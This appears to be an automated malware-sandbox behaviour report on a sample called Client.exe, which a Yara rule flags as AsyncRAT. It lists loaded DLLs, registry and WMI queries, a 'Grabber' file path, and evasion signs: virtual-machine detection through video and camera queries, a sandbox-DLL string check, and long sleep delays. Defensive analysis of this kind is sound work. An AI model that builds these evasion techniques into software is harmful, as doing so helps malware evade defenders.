Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

File written: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Jump to behavior

Source: Client.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Client.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Source: Client.exe

Static PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]

Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C7E330 pushad ; retf		0_2_05C7EB31
Source: C:\Users\user\Desktop\Client.exe	Code function: 0_2_05C7ED92 push es; ret		0_2_05C7EDA0

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Source: C:\Users\user\Desktop\Client.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: Client.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Client.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Client.exe

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Client.exe	Memory allocated: 16B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Memory allocated: 2FA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596489	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 595688	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Window / User API: threadDelayed 2057			Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Window / User API: threadDelayed 7737			Jump to behavior

Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -596489s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -595872s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99888s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98997s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -98092s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -97968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe TID: 4196	Thread sleep time: -97858s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Client.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Client.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\Client.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Client.exe	Thread delayed: delay time: 596860	Jump to behavior
